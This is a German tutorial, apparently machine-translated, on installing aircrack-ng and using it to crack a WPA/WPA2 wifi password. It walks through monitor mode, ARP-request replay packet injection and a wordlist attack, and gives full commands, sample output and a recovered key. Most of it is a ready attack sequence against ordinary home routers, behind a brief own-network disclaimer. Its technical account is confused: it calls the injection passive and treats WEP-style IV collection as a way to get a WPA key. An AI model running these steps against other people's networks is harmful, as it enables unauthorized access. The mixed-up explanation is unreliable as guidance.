Aircrack-ng ist im Grunde eine Netzwerksoftware-Suite, die zur Erreichung der folgenden Ziele entwickelt wurde:
Beachten Sie, dass es sich bei diesem Tutorial nicht um eine erschöpfende Anleitung handelt, sondern vielmehr darum, einige Grundkenntnisse zu erwerben, um die Sicherheit Ihres eigenen Netzwerks zu testen und sich mit den Konzepten vertraut zu machen.
Der unten beschriebene Angriff basiert auf einer passiven Technik (ARP-Request-Replay-Angriff) und konzentriert sich auf Debian-basierte Distributionen, vorausgesetzt, Sie verfügen über eine funktionierende WLAN-Karte mit bereits für die Injektion gepatchten Treibern.
Aircrack-ng kann auf einem Debian-basierten Betriebssystem installiert werden, indem der Quellcode kompiliert wird (weitere Informationen finden Sie auf der offiziellen Website).
Nachfolgend finden Sie Anweisungen zur Installation der Grundvoraussetzungen zum Erstellen von Aircrack-NG für Debian-basierte Betriebssysteme.
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
Holen Sie sich die neueste Kopie von aircrack-ng:
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
Zum Erstellen von Aircrack-NG wird das Autotools-Build-System verwendet. Zuerst ./configure
das Projekt zum Erstellen mit den entsprechenden Optionen:
$ autoreconf -i
$ ./configure --with-experimental
Kompilieren Sie anschließend das Projekt mit dem Befehl make
“ und verwenden Sie das Ziel „installing“ aus den unten aufgeführten zusätzlichen Zielen, um die Installation abzuschließen.
make check
make integration
make install
make uninstall
Der Zweck dieses Schritts stellt sicher, dass Ihre Karte die Injektion erfolgreich unterstützt. Angenommen, Ihr Schnittstellenname ist „wlan0“ (Sie können ihn abrufen, indem Sie iwconfig
auf dem Terminal eingeben), geben Sie den folgenden Befehl ein:
# aireplay-ng --test wlan0
Das System antwortet:
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
Dies bestätigt, dass Ihre Karte Pakete einschleusen kann.
Das erste, was Sie tun müssen, ist, nach einem potenziellen Ziel Ausschau zu halten, indem Sie Ihre WLAN-Karte mit airmon-ng
in den Überwachungsmodus versetzen. Es wird jedoch dringend empfohlen, alle störenden Prozesse zu kill
, bevor Sie die Aircrack-NG-Suite verwenden.
# airmon-ng check kill
Killing these processes:
PID Name
870 dhclient
1115 wpa_supplicant
Anschließend ist es möglich, den Monitormodus zu aktivieren, der zum Erstellen einer weiteren Schnittstelle (mon0) verwendet wird:
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
Sie werden feststellen, dass „wlan0“ erfolgreich in den Überwachungsmodus versetzt wurde. Starten Sie dann airodump-ng
um nach Netzwerken Ausschau zu halten:
# airodump-ng mon0
Suchen Sie das drahtlose Netzwerk, das Sie knacken möchten, und notieren Sie dessen BSSID und Kanal aus der folgenden Ausgabe:
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
Beachten Sie, dass im oberen Teil der Ausgabe Informationen zu den APs in Reichweite und im unteren Teil die mit den entsprechenden APs verbundenen Clients aufgeführt sind.
Öffnen Sie eine weitere Konsolensitzung, um die vom Ziel generierten Anfangsvektoren zu erfassen und das Ergebnis in einer Datei zu speichern:
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
Dabei ist -c 10
der Kanal für das drahtlose Netzwerk, --bssid 08:00:BF:E6:31:2E
die MAC-Adresse des AP, -w output-file
definiert die Ausgabedateien, die die Initialisierungsvektoren enthalten, und mon0
ist der Schnittstellenname.
Das System antwortet:
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
Nach der Ausführung des Befehls werden verschiedene Dateien generiert.
Der klassische ARP-Request-Replay-Angriff ist die effektivste Methode zur Generierung neuer Initialisierungsvektoren und funktioniert sehr zuverlässig. Der Zweck dieses Schritts besteht darin, aireplay-ng
in einem Modus zu starten, der auf ARP-Anfragen lauscht und diese dann wieder an den Zugriffspunkt zurückleitet. Lassen Sie airodump-ng
und aireplay-ng
laufen, öffnen Sie ein anderes Terminal und führen Sie den ARP-Request-Replay-Angriff aus:
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
Sie können überprüfen, ob die Pakete eingefügt werden, indem Sie auf dem airodump-ng
Bildschirm schauen.
An diesem Punkt sollten Sie in der Lage sein, den WPA-Schlüssel aus den in den vorherigen Schritten gesammelten Initialisierungsvektoren zu erhalten. Um diesen Angriff durchzuführen, benötigen Sie eine Wortliste. Wenn das Netzwerkkennwort nicht in der Wortdatei enthalten ist, können Sie das Kennwort nicht knacken. Beachten Sie, dass die meisten WPA/WPA2-Router mit starken 12-stelligen Zufallskennwörtern ausgestattet sind, die viele Benutzer (zu Recht) unverändert lassen. Wenn Sie versuchen, eines dieser Passwörter zu knacken, empfehle ich die Verwendung der Passwortlisten mit WPA-Länge.
Öffnen Sie eine weitere Konsolensitzung und geben Sie Folgendes ein:
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output * .cap
Dabei gibt -a2
den Angriffsmodus für WPA/WPA2-PSK an, -w wordlist.txt
bezieht sich auf Ihre eigene Wörterbuch-Wortliste und output*.cap
wählt alle Ausgabedateien mit der Erweiterung .cap
aus.
Dies ist das Ergebnis eines erfolgreichen Angriffs:
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)
Time left: 0 seconds 15.62%
KEY FOUND! [ notsecure ]
Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63
Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A
EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
Nachfolgend finden Sie die Liste aller Befehle, die zum Knacken eines WPA/WPA2-Netzwerks erforderlich sind.
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
Dieses Projekt ist unter der MIT-Lizenz lizenziert – Einzelheiten finden Sie in der LIZENZ-Datei.
Dieses Tutorial wurde nur zu Bildungszwecken erstellt. Ich befürworte keine böswilligen Praktiken und übernehme keine Verantwortung für illegale Aktivitäten.